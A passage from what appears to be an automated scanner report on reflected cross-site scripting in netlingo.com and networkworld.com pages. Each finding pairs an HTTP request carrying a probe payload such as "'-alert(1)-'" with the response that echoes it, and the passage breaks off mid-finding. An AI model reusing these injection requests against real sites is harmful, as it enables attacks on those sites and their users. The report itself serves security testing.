Date: Tue, 25 Jan 2011 04:58:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/aor?8757c"><a>7ac90e61106=1" />
...[SNIP]...

4.1317. http://www.netlingo.com/word/buff.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/buff.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 118a7"><a>8fa8edf173 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/buff.php?118a7"><a>8fa8edf173=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/buff?118a7"><a>8fa8edf173=1" />
...[SNIP]...

4.1318. http://www.netlingo.com/word/cu46.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/cu46.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48a81"><a>07614ba167d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/cu46.php?48a81"><a>07614ba167d=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/cu46?48a81"><a>07614ba167d=1" />
...[SNIP]...

4.1319. http://www.netlingo.com/word/dead-cell-phones.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/dead-cell-phones.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b65a"><a>f95e8cbe207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/dead-cell-phones.php?5b65a"><a>f95e8cbe207=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/dead-cell-phones?5b65a"><a>f95e8cbe207=1" />
...[SNIP]...

4.1320. http://www.netlingo.com/word/dead-computers.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/dead-computers.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19a93"><a>65d9049a388 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/dead-computers.php?19a93"><a>65d9049a388=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/dead-computers?19a93"><a>65d9049a388=1" />
...[SNIP]...

4.1321. http://www.netlingo.com/word/digitally-grounded.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/digitally-grounded.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2eed"><a>df9967afe66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/digitally-grounded.php?c2eed"><a>df9967afe66=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/digitally-grounded?c2eed"><a>df9967afe66=1" />
...[SNIP]...

4.1322. http://www.netlingo.com/word/do-not-track.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/do-not-track.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37078"><a>2381b013eb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/do-not-track.php?37078"><a>2381b013eb9=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/do-not-track?37078"><a>2381b013eb9=1" />
...[SNIP]...

4.1323. http://www.netlingo.com/word/elancers.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/elancers.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cb70"><a>b5d222c3b41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/elancers.php?7cb70"><a>b5d222c3b41=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/elancers?7cb70"><a>b5d222c3b41=1" />
...[SNIP]...

4.1324. http://www.netlingo.com/word/fingerprint.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/fingerprint.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 161dc"><a>6bdb1163c15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/fingerprint.php?161dc"><a>6bdb1163c15=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/fingerprint?161dc"><a>6bdb1163c15=1" />
...[SNIP]...

4.1325. http://www.netlingo.com/word/gadget.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/gadget.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e51"><a>522c4e127ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/gadget.php?58e51"><a>522c4e127ce=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/gadget?58e51"><a>522c4e127ce=1" />
...[SNIP]...

4.1326. http://www.netlingo.com/word/gizmo.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/gizmo.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39d82"><a>d22f30a3d97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/gizmo.php?39d82"><a>d22f30a3d97=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/gizmo?39d82"><a>d22f30a3d97=1" />
...[SNIP]...

4.1327. http://www.netlingo.com/word/lm4azzzz.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/lm4azzzz.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e602f"><a>2c13ec09b5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/lm4azzzz.php?e602f"><a>2c13ec09b5a=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/lm4azzzz?e602f"><a>2c13ec09b5a=1" />
...[SNIP]...

4.1328. http://www.netlingo.com/word/mih.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/mih.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1933"><a>5d0ab0d4558 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/mih.php?d1933"><a>5d0ab0d4558=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/mih?d1933"><a>5d0ab0d4558=1" />
...[SNIP]...

4.1329. http://www.netlingo.com/word/next-generation.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/next-generation.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3863"><a>0b0755e8582 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/next-generation.php?e3863"><a>0b0755e8582=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/next-generation?e3863"><a>0b0755e8582=1" />
...[SNIP]...

4.1330. http://www.netlingo.com/word/online-jargon.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/online-jargon.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f22d6"><a>2eff2181cca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/online-jargon.php?f22d6"><a>2eff2181cca=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/online-jargon?f22d6"><a>2eff2181cca=1" />
...[SNIP]...

4.1331. http://www.netlingo.com/word/ru18-2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/ru18-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef7b5"><a>f9a76007f4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/ru18-2.php?ef7b5"><a>f9a76007f4b=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/ru18-2?ef7b5"><a>f9a76007f4b=1" />
...[SNIP]...

4.1332. http://www.netlingo.com/word/wtg4a.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/wtg4a.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4b5"><a>3bbfcd0a39f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/wtg4a.php?2e4b5"><a>3bbfcd0a39f=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/wtg4a?2e4b5"><a>3bbfcd0a39f=1" />
...[SNIP]...

4.1333. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /community/blog/ebay-use-joomla-open-source-glue

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db447'-alert(1)-'4497b15d2bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /communitydb447'-alert(1)-'4497b15d2bd/blog/ebay-use-joomla-open-source-glue HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Expires: Tue, 25 Jan 2011 05:07:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:07:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295932058950579; path=/; expires=Thu, 24-Jan-13 05:07:38 GMT
Content-Length: 76772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
e: '(none)',
           subtopic: '',
           freemium: '(none)',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: '(none)',
request_uri: '/communitydb447'-alert(1)-'4497b15d2bd/blog/ebay-use-joomla-open-source-glue',
doc_uri: '/badlink.html',
site: 'general',
rxid: '(none)',
nodeid: '(none)'    
};
}();
var jq_nodeid =
...[SNIP]...

4.1334. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /community/blog/ebay-use-joomla-open-source-glue

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 631b9'-alert(1)-'9295e160622 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community/blog631b9'-alert(1)-'9295e160622/ebay-use-joomla-open-source-glue HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
nnCoection: close
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:08:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:08:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295932083119661; path=/; expires=Thu, 24-Jan-13 05:08:03 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=lts7jggqt7mh4usckji1vi4kq5; expires=Thu, 17-Feb-2011 08:41:23 GMT; path=/; domain=.networkworld.com
Content-Length: 54336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang =
...[SNIP]...
,
           subtopic: '(none)',
           freemium: '(none)',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: '(none)',
request_uri: '/community/blog631b9'-alert(1)-'9295e160622/ebay-use-joomla-open-source-glue',
doc_uri: '/community/index.php',
site: '(none)',
rxid: '(none)',
nodeid: '(none)'    
};
}();
var jq_nodeid
...[SNIP]...

4.1335. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /community/blog/ebay-use-joomla-open-source-glue

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7ae6'-alert(1)-'d4cd0158299 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community/blog/ebay-use-joomla-open-source-gluee7ae6'-alert(1)-'d4cd0158299 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
nnCoection: close
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:08:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:08:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295932117258923; path=/; expires=Thu, 24-Jan-13 05:08:37 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=oi7cm0b0p4fmmc7550rogm6md1; expires=Thu, 17-Feb-2011 08:41:57 GMT; path=/; domain=.networkworld.com
